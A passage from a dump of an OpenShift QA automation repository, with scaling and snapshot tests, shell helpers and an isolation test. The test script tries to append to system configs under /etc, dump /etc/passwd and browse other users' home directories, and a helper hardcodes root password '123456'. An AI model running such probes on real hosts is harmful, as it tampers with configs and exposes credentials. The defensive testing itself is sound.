\tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass NegativeScaling(OpenShiftTest):\n def configure_scale_up_test_application(self, git_repo):\n new_file = open(git_repo + \"/php/gear.php\", \"w\")\n new_file.write(\"<?php\\n\")\n new_file.write(\"header(\\\"Content-Type: text/plain\\\");\\n\")\n new_file.write(\"echo $_ENV[\\\"OPENSHIFT_GEAR_DNS\\\"];\\n\")\n new_file.write(\"?>\")\n new_file.close()\n\n configuration_steps = [\n \"cd %s\" % ( git_repo ),\n \"git add php\",\n \"git commit -a -m gear.php\",\n \"git push\"\n ]\n\n return common.command_get_status(\" && \".join(configuration_steps))\n\n def number_of_gears(self, app_name):\n app_url = OSConf.get_app_url(app_name)\n gears = list()\n\n # Checking the output of gear dns script more times\n for i in range(1, 11):\n gear = common.fetch_page(str(app_url) + \"/gear.php\")\n if gear not in gears:\n gears.append(gear)\n\n return len(gears)\n\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\n \"Creating a scalable application\",\n common.create_app,\n function_parameters = [ self.app_name, self.app_type, self.user_email, self.user_passwd, True, self.git_repo, True ],\n expect_description = \"The application must be created successfully\",\n expect_return = 0\n ))\n self.steps_list.append(testcase.TestCaseStep(\n \"Scaling up via REST API\",\n common.scale_up,\n function_parameters = [ self.app_name, self.domain_name ],\n expect_description = \"The application must scale-up successfully\",\n expect_return = 0\n ))\n\n # Checking web-page availability with refreshing\n for i in range(1,6):\n self.steps_list.append(testcase.TestCaseStep(\n \"Checking web-page #%d\" % ( i ),\n common.check_web_page_output,\n function_parameters = [ self.app_name ],\n expect_description = \"The application must be available in the browser\",\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Configuring the test application\",\n self.configure_scale_up_test_application,\n function_parameters = [ self.git_repo ],\n expect_description = \"The application must be configured successfully\",\n expect_return = 0\n ))\n self.steps_list.append(testcase.TestCaseStep(\n \"Checking the number of gears\",\n self.number_of_gears,\n function_parameters = [ self.app_name ],\n expect_description = \"The number of gears must be '2'\",\n expect_return = 2\n ))\n \n self.steps_list.append(testcase.TestCaseStep(\n \"Scaling down via REST API\",\n common.scale_down,\n function_parameters = [ self.app_name, self.domain_name],\n expect_description = \"The application must scale-down successfully\",\n expect_return =0 \n ))\n \n \n self.steps_list.append(testcase.TestCaseStep(\n \"Scaling down via REST API\",\n common.scale_down,\n function_parameters = [ self.app_name, self.domain_name],\n expect_description = \"The application must scale-down successfully\",\n expect_return =0\n ))\n \n case = testcase.TestCase(\"[US1463][BusinessIntegration] Scale-up / Scale down an application \", self.steps_list)\n case.add_clean_up(\n \"rm -Rf %s\" % ( self.git_repo )\n )\n case.run()\n\n\tif case.testcase_status == 'PASSED':\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\tif case.testcase_status == 'FAILED':\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(NegativeScaling)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.4507547914981842, "alphanum_fraction": 0.46606144309043884, "avg_line_length": 28.14769172668457, "blob_id": "8ee52595c2dafdeba7cf12df725180d01e5e8d32", "content_id": "1ec85e7d183c731d8521c4463358bec8abe66c87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 9473, "license_type": "no_license", "max_line_length": 133, "num_lines": 325, "path": "/automation/open/Longevity/common_func.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n#################################################################################\n# FileName: common_func.sh\n# Author: <[email protected]> \n# Description: provide the common fucntion for all test cases\n# Version: 1.0\n# Function List: kill_process; end_test; run; error; info; check_point; sysinfo\n# kill_process: Kill the process base on passed parameter.\n# target_reboot: Reboot tested machine when current running failed. \n# run: print the info for the command and execute the command\n# error: print the error infomation with standard format\n# info: print some infomation with (INFO) tag\n# sysinfo: profile the system information\n# History: Revision history\n#################################################################################\n\nexport PATH=/sbin:/usr/sbin:/bin:$PATH\n\n#################################################################################\n#$0 $(file or direcotry) $ip $pasword $(source directory)\n#################################################################################\nscp_task()\n{\nexpect -f - <<EOF\nset timeout -1\nspawn scp -r $1 root@$2:$4\nexpect {\n\t\"Are you sure you want to continue connecting (yes/no)?\"\t\t{send \"yes\\r\";exp_continue}\n\t\"*assword:\"\t\t\t{send \"$3\\r\";exp_continue}\n}\nwait\nEOF\n}\n\n#################################################################################\n#$0 $ip $pasword \"command\"\n#################################################################################\ntask_ssh_root()\n{\nexpect -f - <<EOF\nset timeout -1\nspawn ssh root@$1 \"$3\"\nexpect {\n\t\"Are you sure you want to continue connecting (yes/no)?\"\t\t{send \"yes\\r\";exp_continue}\n\t\"*assword:\"\t\t\t{send \"$2\\r\";exp_continue}\n}\nwait\nEOF\n}\n\n#################################################################################\n# Function: kill_process\n# Description: Kill all process with keyword\n# Input: keywords of child process name \n# Output: child process pid\n# Return: 0\n# Others: none\n#################################################################################\n\nfunction kill_process()\n{\nsign=$1\npid=`ps aux|grep $sign|grep -v grep|awk '{print $2}'`\nkill -9 $pid\nreturn 0\n}\n\n#################################################################################\n# Function: target_reboot \n# Description: Reboot tested machine\n# Input: target machine IP\n# Output: none\n# Return: 0\n# Others: none\n#################################################################################\nfunction target_reboot()\n{\nexpect -f - <<EOF\nspawn ssh root@$SUT_IP \"init 6\"\nexpect {\n\t \"Are you sure you want to continue connecting (yes/no)?\" { send \"yes\\r\"; exp_continue }\n\t \"*assword:\" { send \"123456\\r\";exp_continue }\n\t\teof\t\t\t\t\t\t\t{ send_user \"eof\" }\n\t\t\t }\n\t\twait\nEOF\nsleep 1\nexit\nreturn 0\n}\n\n#################################################################################\n# Function: echo_$color\n# Description: echo color with font,Facilitate the observation log output\n# Input: echo log\n# Output: none\n# Others: none\n#################################################################################\nfunction echo_red()\n{\n\t echo -e \"\\e[1;31m\"$*\"\\e[0m\"\n}\n\necho_blue()\n{ \n\t echo -e \"\\e[1;34m\"$*\"\\e[0m\" \n}\n\necho_green()\n{ \n\t echo -e \"\\e[1;32m\"$*\"\\e[0m\" \n}\n\necho_yellow()\n{ \n\techo -e \"\\e[1;33m\"$*\"\\e[0m\"\n}\n\necho_pink()\n{ \n\techo -e \"\\e[1;35m\"$*\"\\e[0m\"\n}\n\necho_bold()\n{ \n\t echo -e \"\\e[1;38m\"$*\"\\e[0m\" \n}\n\n\n#################################################################################\n# Function: run\n# Description: print the command information and execute the command\n# Input: the command\n# Output: the comand information and execution result\n# Return: return the value which returned by the command\n# Others: none\n#################################################################################\nfunction run()\n{\n\techo \n\techo_blue \"-------------------------Function $1 start-------------------------------\"\n\techo -n \"[$(pwd)]#\"\n\techo \"$*\"\n\teval \"$*\"\n\tr_value=$?\n\techo_blue \"--------------------------Function $1 end--------------------------------\"\n\tif [ \"$r_value\" -ne 0 ] ;then \n echo_red \"$1 function running failed!\" && \n runlevel|grep 5 > /dev/null && notify-send \"Testing failed ...\" \n #exit 1 \n else\n echo_green \"$1 function running end!\"\n fi\n\techo \n}\n\n#################################################################################\n# Function: task_scp\n# Description: Auto scp file to target machine\n# Input: file user@target_ip:/dir/\n# Output: none\n# Return: none\n# Others: none\n#################################################################################\nfunction task_scp()\n{\n\t#expect is a software suite for automating interactive tools\nexpect -f - <<EOF\nset timeout 6000\nspawn scp -r $1 $2@$3:$4\nexpect {\n\t\"Are you sure you want to continue connecting (yes/no)?\" { send \"yes\\r\" ; exp_continue }\n\t\"assword:\" { send \"$5\\r\"; exp_continue }\n\teof\t{ send_user \"eof\" }\n}\nwait\nEOF\n}\n\n#################################################################################\n# Function: sysinfo\n# Description: profile the system information\n# Input: none\n# Output: system information\n# Return: none\n# Others: none\n#################################################################################\nfunction sysinfo()\n{\n tmpstarts=`dmidecode | grep -n \"\" | grep \"Handle 0x\" | cut -d \":\" -f 1`\n shopt -s extglob\n tmpstarts=`echo $tmpstarts`\n tmpends=${tmpstarts/#+([[:digit:]]) /}\n tmpends=\"$tmpends 10000\"\n index=0\n for start in $tmpstarts\n do\n starts[$index]=$start\n index=$((index+1))\n done\n \n index=0\n for end in $tmpends\n do\n ends[$index]=$end\n index=$((index+1))\n done\n \n \n \n # processor\n echo \"Processor Information\"\n echo \"=====================\"\n processor=`mydmidecode -t processor | grep Version | head -n 1 | awk -F \":\" '{print $2}' | sed 's/^ //g' | sed 's/ \\{1,\\}/ /g'`\n if [ \"${processor:0:3}\" = \"Not\" ]\n then\n processor=`cat /proc/cpuinfo | grep \"model name\" | head -n 1 | awk -F \":\" '{print $2}' | sed 's/^ //g' | sed 's/ \\{1,\\}/ /g'`\n fi\n processornum=`mydmidecode -t processor | grep \"Socket Designation: \" | wc -l`\n \n cores=`cat /proc/cpuinfo | grep \"cpu cores\" | head -n 1 | sed 's/^.*: //g'`\n \n phymem=`mydmidecode -t memory | grep Size | awk 'BEGIN {sum=0} {if (int($2)!=0) sum+=$2} END {print sum/1024;}'`\n availmem=`cat /proc/meminfo | head -n 1 | awk '{printf \"%.2f\", $2/1024/1024;}'`\n \n echo \"processor type: $processor\"\n echo \"number of CPU: $processornum\"\n echo \"number of core per CPU: $cores\"\n \n # Cache info\n index=0\n tmpvar=`mydmidecode -t cache | grep \"Configuration: \" | grep \"Level \" | sed 's/^.*, Level //g'`\n for item in $tmpvar\n do\n levels[$index]=$item\n index=$((index+1))\n done\n \n index=0\n tmpvar=`mydmidecode -t cache | grep \"System Type\" | cut -d \":\" -f 2 | sed 's/ //g'`\n for item in $tmpvar\n do\n cachetypes[$index]=$item\n index=$((index+1))\n done\n \n index=0\n tmpvar=`mydmidecode -t cache | grep \"Installed Size\" | cut -d \":\" -f 2 | sed 's/ //g'`\n for item in $tmpvar\n do\n cachesizes[$index]=$item\n index=$((index+1))\n done\n \n rm -f /tmp/.cacheinfo.txt\n for (( i = 0; i < $index; i++ ))\n do\n echo \"L${levels[$i]} ${cachetypes[$i]} cache size: ${cachesizes[$i]/KB/ KB}\" >> /tmp/.cacheinfo.txt\n done\n cat /tmp/.cacheinfo.txt | sort | uniq\n rm -f /tmp/.cacheinfo.txt\n echo \"\"\n \n # Memory\n echo \"Memory Information\"\n echo \"==================\"\n echo \"Physical memory size: $phymem GB\"\n echo \"Available memory size: $availmem GB\"\n echo \"\"\n \n # Harddisk\n echo \"Harddisk Information\"\n echo \"====================\"\n fdisk -l 2>&1 | grep Disk | sed 's/^Disk //g'\n echo \"\"\n \n # SCSI device list\n which lsscsi > /dev/null 2>&1\n if [ $? -eq 0 ]\n then\n echo \"SCSI Device List\"\n echo \"================\"\n lsscsi\n fi\n echo \"\"\n \n # PCI/PCIE Slot Information\n rm -f /tmp/.pciinfo1.txt\n rm -f /tmp/.pciinfo2.txt\n echo \"PCI/PCIE Slot Information\"\n echo \"=========================\"\n printf \"%20s\\t%s\\n\" \"Slot\" \"Type\"\n printf \"%20s\\t%s\\n\" \"----\" \"----\"\n mydmidecode -t slot | grep \"Designation: \" | sed 's/^.*Designation: //g' > /tmp/.pciinfo1.txt\n mydmidecode -t slot | grep \"Type: \" | sed 's/^.*Type: //g' > /tmp/.pciinfo2.txt\n \n lines=`cat /tmp/.pciinfo2.txt | wc -l`\n for (( i = 0; i < $lines; i++ ))\n do\n slot=`cat /tmp/.pciinfo1.txt | sed -n \"$((i+1))\"p | sed 's/^ \\{1,\\}//g' | sed 's/ \\{1,\\}$//g'`\n type=`cat /tmp/.pciinfo2.txt | sed -n \"$((i+1))\"p`\n printf \"%20s\\t%s\\n\" \"$slot\" \"$type\"\n done\n rm -f /tmp/.pciinfo1.txt\n rm -f /tmp/.pciinfo2.txt\n echo \"\"\n \n # lspci\n echo \"PCI Device Information\"\n echo \"======================\"\n lspci | cut -d \" \" -f 2-\n echo \"\"\n \n # On Board Device Information\n echo \"On Board Device Information\"\n echo \"===========================\"\n mydmidecode -t baseboard | grep -A 200 \"On Board Device\" | grep \"Description: \" | sed 's/^.*Description: //g'\n echo \"\"\n \n # OS Version\n echo \"OS Version\"\n echo \"==========\"\n cat /etc/*-release\n}\n" }, { "alpha_fraction": 0.5776389837265015, "alphanum_fraction": 0.5833854079246521, "avg_line_length": 53.828765869140625, "blob_id": "a44ed1ccad02e9c7980d34f231d4d7475479d82d", "content_id": "09674a2fb07308725d8a9cb0e2305a699d6fc908", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8005, "license_type": "no_license", "max_line_length": 235, "num_lines": 146, "path": "/automation/open/testmodules/RT/cartridge/snapshot_restore_big_data_to_new_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\n2012-07-24\n\n[rhc-cartridge]snapshot/restore big data to new app\nhttps://tcms.engineering.redhat.com/case/167902/\n\"\"\"\nimport os\nimport common\nimport OSConf\nimport rhtest\nimport time\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False # define to True if your test is interactive (takes user input).\n ITEST = ['DEV', 'INT', 'STG'] #this will be checked by framework\n WORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\n def initialize(self):\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"WARN: Missing variant, used `php` as default\")\n self.test_variant = 'php'\n self.summary = \"[rhc-cartridge]snapshot/restore big data to new app\"\n self.app_name = self.test_variant.split('-')[0] + \"bigdata\" + common.getRandomString(4)\n self.app_type = common.app_types[self.test_variant]\n self.git_repo = \"./%s\" % (self.app_name)\n self.filesize = 300 # filesize is calculated by MB\n try:\n self.scalable = self.config.tcms_arguments['scalable']\n except:\n self.scalable = False\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -f %s*\" % (self.app_name))\n\n\nclass BigDataTest(OpenShiftTest):\n\n def test_method(self):\n self.step(\"Create %s app: %s\" % (self.app_type, self.app_name))\n ret = common.create_app(self.app_name, common.app_types[self.test_variant], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True, \"./\", self.scalable)\n self.assert_equal(ret, 0, \"Failed to create %s app: %s\" % (self.app_type, self.app_name))\n\n self.app_url = OSConf.get_app_url(self.app_name)\n self.url_dict = { \"php\" : { \"create\": \"%s/data.php?action=create&size=%s\" % (self.app_url, self.filesize),\n \"delete\": \"%s/data.php?action=delete\" % (self.app_url),\n \"show\" : \"%s/data.php?action=show\" % (self.app_url)},\n \"jbossas\": { \"create\": \"%s/data.jsp?action=create&size=%s\" % (self.app_url, self.filesize),\n \"delete\": \"%s/data.jsp?action=delete\" % (self.app_url),\n \"show\" : \"%s/data.jsp?action=show\" % (self.app_url)},\n \"perl\" : { \"create\": \"%s/data.pl?action=create&size=%s\" % (self.app_url, self.filesize),\n \"delete\": \"%s/data.pl?action=delete\" % (self.app_url),\n \"show\" : \"%s/data.pl?action=show\" % (self.app_url)},\n \"python\": { \"create\": \"%s/create?size=%s\" % (self.app_url, self.filesize),\n \"delete\": \"%s/delete\" % (self.app_url),\n \"show\" : \"%s/show\" % (self.app_url)},\n \"ruby\" : { \"create\": \"%s/create?size=%s\" % (self.app_url, self.filesize),\n \"delete\": \"%s/delete\" % (self.app_url),\n \"show\" : \"%s/show\" % (self.app_url)},\n }\n self.url_dict[\"jbosseap\"] = self.url_dict[\"jbossas\"]\n self.url_dict[\"jbossews\"] = self.url_dict[\"jbossas\"]\n self.url_dict[\"jbossews-2.0\"] = self.url_dict[\"jbossas\"]\n self.url_dict[\"ruby-1.9\"] = self.url_dict[\"ruby\"]\n\n self.step(\"Copy sample app to git repo\")\n if self.test_variant in ('php'):\n cmd = \"cp -f %s/app_template/bigdata/datadir/data.php %s/php/\" % (OpenShiftTest.WORK_DIR, self.git_repo)\n elif self.test_variant in ('jbossas', 'jbosseap','jbossews','jbossews-2.0'):\n cmd = \"cp -f %s/app_template/bigdata/datadir/data.jsp %s/src/main/webapp/\" % (OpenShiftTest.WORK_DIR, self.git_repo)\n elif self.test_variant in ('perl'):\n cmd = \"cp -f %s/app_template/bigdata/datadir/data.pl %s/perl/\" % (OpenShiftTest.WORK_DIR, self.git_repo)\n elif self.test_variant in ('python'):\n cmd = \"cp -f %s/app_template/bigdata/datadir/application %s/wsgi/\" % (OpenShiftTest.WORK_DIR, self.git_repo)\n elif self.test_variant in ('ruby', 'ruby-1.9'):\n cmd = \"cp -f %s/app_template/bigdata/datadir/{config.ru,Gemfile} %s/ && cd %s/ ; bundle check ; bundle install\" % (OpenShiftTest.WORK_DIR, self.git_repo, self.git_repo)\n ret = common.command_get_status(cmd)\n self.assert_equal(ret, 0, \"Failed to copy sample app to local git repo\")\n\n self.step(\"Git push all the changes\")\n cmd = \"cd %s && git add . && git commit -amt && git push\" % (self.git_repo)\n ret = common.command_get_status(cmd)\n self.assert_equal(ret, 0, \"Git push failed\")\n\n self.step(\"Wait for the app to become available\")\n url = self.url_dict[self.test_variant][\"show\"]\n ret = common.grep_web_page(url, \"The bigfile doesnot exist\", \"-H 'Pragma: no-cache' -L\", 5, 4)\n self.assert_equal(ret, 0, \"The app doesn't become available in reasonable time\")\n\n # This step may take very long time\n self.step(\"Access the 'create' page to create a big file\")\n self.info(\"This step may take a very long time\")\n url = self.url_dict[self.test_variant][\"create\"]\n cmd = \"curl -H 'Pragma: no-cache' -L '%s'\" % (url)\n ret = common.command_get_status(cmd, timeout=-1)\n\n self.step(\"Check the bigfile exists\")\n url = self.url_dict[self.test_variant][\"show\"]\n ret = common.grep_web_page(url, \"The bigfile exists\", \"-H 'Pragma: no-cache' -L\", 5, 6)\n self.assert_equal(ret, 0, \"The bigfile doesn't exist\")\n\n self.step(\"Take snapshot of the app\")\n self.info(\"This step may take a very long time(more than half an hour). If it hangs forever, please terminate this script and test manually\")\n cmd = \"rm -f %s.tar.gz ; rhc snapshot save %s -f %s.tar.gz -l %s -p '%s' %s\" % (self.app_name, self.app_name, self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS)\n ret = common.command_get_status(cmd, timeout=-1)\n self.assert_equal(ret, 0, \"Failed to save snapshot\")\n\n self.step(\"Destroy the app\")\n ret = common.destroy_app(self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True)\n self.assert_equal(ret, 0, \"Failed to destroy app: %s\" % (self.app_name))\n\n self.step(\"Create a new app with the same name\")\n ret = common.create_app(self.app_name, common.app_types[self.test_variant], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True, \"./\", self.scalable)\n self.assert_equal(ret, 0, \"Failed to re-create %s app: %s\" % (self.app_type, self.app_name))\n\n self.step(\"Use the snapshot tarball to restore it\")\n self.info(\"This step may take a very long time. If it hangs forever, please terminate this script and test manually\")\n cmd = \"rhc snapshot restore %s -f %s.tar.gz -l %s -p '%s' %s\" % (self.app_name, self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS)\n ret = common.command_get_status(cmd, timeout=-1)\n self.assert_equal(ret, 0, \"Failed to restore the new app\")\n\n self.step(\"Check if the bigfile is restored\")\n url = self.url_dict[self.test_variant][\"show\"]\n ret = common.grep_web_page(url, \"The bigfile exists\", \"-H 'Pragma: no-cache' -L\", 5, 6)\n self.assert_equal(ret, 0, \"The bigfile isn't successfully restored\")\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(BigDataTest)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5764349102973938, "alphanum_fraction": 0.623034656047821, "avg_line_length": 19.6171875, "blob_id": "1b125c41b5c6ded87b3045fd891d18ce18e24d14", "content_id": "b29f74eecefe1b3ac4968c0d1e9ff55395853f0c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 5279, "license_type": "no_license", "max_line_length": 98, "num_lines": 256, "path": "/automation/open/testmodules/RT/security/data/read_write_libra_important_data_devenv.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/sh\nuser_home=$(env | grep '^HOME=' | cut -d= -f2)\necho \"User Home Directory: $user_home\"\nuser_name=$(basename $user_home)\necho \"User name: $user_name\"\nuser_id=$(id -u $user_name)\necho \"User ID: $user_id\"\nlibra_version=$(/bin/rpm -qa | grep rhc)\necho \"Libra Verison on node: \"\necho \"$libra_version\"\necho \"\"\necho \"\"\necho \"\"\n\necho \"###Test Case###: Security - Write or modify libra important data\";\n\ncommand1=\"touch ${user_home}/git/write_x.git\"\necho \"Command 1: $command1\"\neval \"$command1\"\ncommand1_ret=$?\necho \"Command 1 return $command1_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand2_ret=0\nfor i in $(ls ${user_home}/*/conf.d/openshift.conf); do\n echo \"Command 2: echo xx >>$i\"\n echo \"xx\" >>$i\n tmp_ret=$?\n if [ $tmp_ret -eq 0 ]; then\n echo \"Scceed to write $i\"\n command2_ret=0\n break\n else\n command2_ret=1\n fi\ndone\necho \"Command 2 return $command2_ret\"\necho \"\"\necho \"\"\necho \"\"\n\n\ncommand3=\"echo xx >> /etc/mcollective/server.cfg\"\necho \"Command 3: $command3\"\neval \"$command3\"\ncommand3_ret=$?\necho \"Command 3 return $command3_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand5=\"echo xx >> /etc/mcollective/client.cfg\"\necho \"Command 5: $command5\"\neval \"$command5\"\ncommand5_ret=$?\necho \"Command 5 return $command5_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand6=\"echo xx >> /etc/openshift/resource_limits.conf\"\necho \"Command 6: $command6\"\neval \"$command6\"\ncommand6_ret=$?\necho \"Command 6 return $command6_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand7=\"echo xx >> /etc/qpidd.conf\"\necho \"Command 7: $command7\"\neval \"$command7\"\ncommand7_ret=$?\necho \"Command 7 return $command7_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand9=\"cat /etc/mcollective/server.cfg\"\necho \"Command 9: $command9\"\neval \"$command9\"\ncommand9_ret=$?\necho \"Command 9 return $command9_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand10=\"cat /etc/libra/node.conf\"\necho \"Command 10: $command10\"\neval \"$command10\"\ncommand10_ret=$?\necho \"Command 10 return $command10_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand11=\"ls /var/lib/openshift/\"\necho \"Command 11: $command11\"\neval \"$command11\"\ncommand11_ret=$?\necho \"Command 11 return $command11_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand12=\"touch /var/lib/openshift/com12_test\"\necho \"Command 12: $command12\"\neval \"$command12\"\ncommand12_ret=$?\necho \"Command 12 return $command12_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand13_ret=1\nfor i in $(grep 'libra guest' /etc/passwd | awk -F\":\" '{print $6}' | grep -v $user_name); do\n command=\"ls $i\"\n echo \"Command 13: $command\"\n eval \"$command\"\n tmp_ret=$?\n if [ $tmp_ret -eq 0 ]; then\n echo \"Scceed to read $i\"\n command13_ret=0\n break\n else\n command13_ret=1\n fi\ndone\necho \"Command 13 return $command13_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand14_ret=1\nfor i in $(grep 'libra guest' /etc/passwd | awk -F\":\" '{print $6}' | grep -v $user_name); do\n command=\"cd $i\"\n echo \"Command 14: $command\"\n eval \"$command\"\n tmp_ret=$?\n if [ $tmp_ret -eq 0 ]; then\n echo \"Scceed to excute $i\"\n command14_ret=0\n break\n else\n command14_ret=1\n fi\ndone\necho \"Command 14 return $command14_ret\"\necho \"\"\necho \"\"\necho \"\"\n\n\ncommand15_ret=1\nfor i in $(grep 'libra guest' /etc/passwd | awk -F\":\" '{print $6}' | grep -v $user_name); do\n command=\"stat $i\"\n echo \"Command: $command\"\n eval \"$command\"\n tmp_ret=$?\n if [ X\"$tmp_ret\" == X\"0\" ]; then\n command=\"stat $i | grep Uid | awk -F'(' '{print \\$2}' | awk -F')' '{print \\$1}' | cut -c4\"\n other_flag=$(eval \"$command\")\n echo \"Command 15: {$command} - {$other_flag}\"\n if [ X\"$other_flag\" != X\"0\" ]; then\n echo \"Dir - $i have some permisson for other user\"\n command15_ret=0\n break\n else\n command15_ret=1\n fi\n else\n echo \"stat operation to $i failed, skipping \"\n command15_ret=1\n fi\ndone\necho \"Command 15 return $command15_ret\"\necho \"\"\necho \"\"\necho \"\"\n\n\ncommand16=\"cat /etc/mcollective/client.cfg\"\necho \"Command 16: skip...\"\n#eval \"$command16\"\ncommand16_ret=1\necho \"Command 16 return $command16_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand17=\"cat /etc/qpidd.conf\"\necho \"Command 17: skip...\"\n#eval \"$command17\"\ncommand17_ret=1\necho \"Command 17 return $command17_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand18=\"cat /etc/qpid/qpidc.conf\"\necho \"Command 18: skip...\"\n#eval \"$command18\"\ncommand18_ret=1\necho \"Command 18 return $command18_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand19=\"echo xx >> /etc/qpid/qpidc.conf\"\necho \"Command 19: $command19\"\neval \"$command19\"\ncommand19_ret=$?\necho \"Command 19 return $command19_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand20=\"ls /etc/qpid/pki; cp -r /etc/qpid/pki ./; ls ./pki\"\necho \"Command20: skip...\"\n#eval \"$command20\"\n#line_count=$(ls ./pki | wc -l)\n#if [ ${line_count} -gt 0 ]; then \n# command20_ret=0\n#else \n# command20_ret=1\n#fi\ncommand20_ret=1\necho \"Command 20 return $command20_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand21=\"cat /etc/passwd\"\necho \"Command 21: $command21\"\neval \"$command21\"\ncommand21_ret=$?\necho \"Command 21 return $command21_ret\"\necho \"\"\necho \"\"\necho \"\"\n\nfor i in {1..21}; do \n eval ii=\"$\"command${i}_ret\n echo \"Command ${i} result: $ii\"\n if [ X\"$ii\" == X\"0\" ]; then\n result=\"FAIL\"\n break\n else\n result=\"PASS\"\n fi\ndone\n\n\necho \"###RESULT###: ${result}\"\n\n" }, { "alpha_fraction": 0.7368420958518982, "alphanum_fraction": 0.7368420958518982, "avg_line_length": 37, "blob_id": "d0272a8119d40e95e3f9602039c0d124a5d92493", "content_id": "9ad4b443c0c534ed81f6e646e7f5896b7517ce7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 38, "license_type": "no_license", "max_line_length": 37, "num_lines": 1, "path": "/automation/open/testmodules/RT/quick_start/__init__.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "# place holder do we can do immports.\n" }, { "alpha_fraction": 0.5372806787490845, "alphanum_fraction": 0.5427631735801697, "avg_line_length": 30.379310607910156, "blob_id": "2e8817bad91de94486a37305c463c33f89bbb9f3", "content_id": "2a64f9690f7f19566169ca5782bb8457a0575545", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 912, "license_type": "no_license", "max_line_length": 75, "num_lines": 29, "path": "/automation/open/lib/common/web.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from consts import *\nfrom misc import *\nimport OSConf\nimport re\n\ndef get_num_of_gears_by_web(app_name, app_type):\n \"\"\"\n Calls /env.* page with all of the env variables\n and seeks for OPENSHIFT_GEAR_DNS occurence.\n \"\"\"\n app_url = OSConf.get_app_url(app_name)\n url = app_url + \"/env\" + APP_SUFFIX[app_type.split('-')[0]]\n gears = list()\n #\n #we will seek for OPENSHIFT_GEAR_DNS\n #\n #pattern = re.compile(r\"^(OPENSHIFT_[\\w\\_]*GEAR_DNS.*)$\", re.MULTILINE)\n pattern = re.compile(r\"^(OPENSHIFT_GEAR_DNS.*)$\", re.MULTILINE)\n for i in range(7):\n for i in range(3):\n page = fetch_page(url)\n obj = pattern.search(page)\n if obj:\n gear = obj.group(1)\n if gear not in gears:\n log.info(\"GEAR: [%s]\"%gear)\n gears.append(gear)\n time.sleep(7)\n return len(gears)\n\n\n" }, { "alpha_fraction": 0.5046296119689941, "alphanum_fraction": 0.5122685432434082, "avg_line_length": 34.40983581542969, "blob_id": "9c4b729c038e87fe4a4d0f4afce26145fc01e2bc", "content_id": "8edfadb932b50be65f2f2285f95773655c450fdd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4320, "license_type": "no_license", "max_line_length": 172, "num_lines": 122, "path": "/automation/open/testmodules/RT/client/rhc_tail_files_options_jbossas.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport testcase, common, OSConf, proc\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n\tself.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.app_type = common.app_types[\"jbossas\"]\n self.app_name = \"jbossastail\"\n tcms_testcase_id=122408\n \tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n pass\ndef create_proc(cmd):\n return 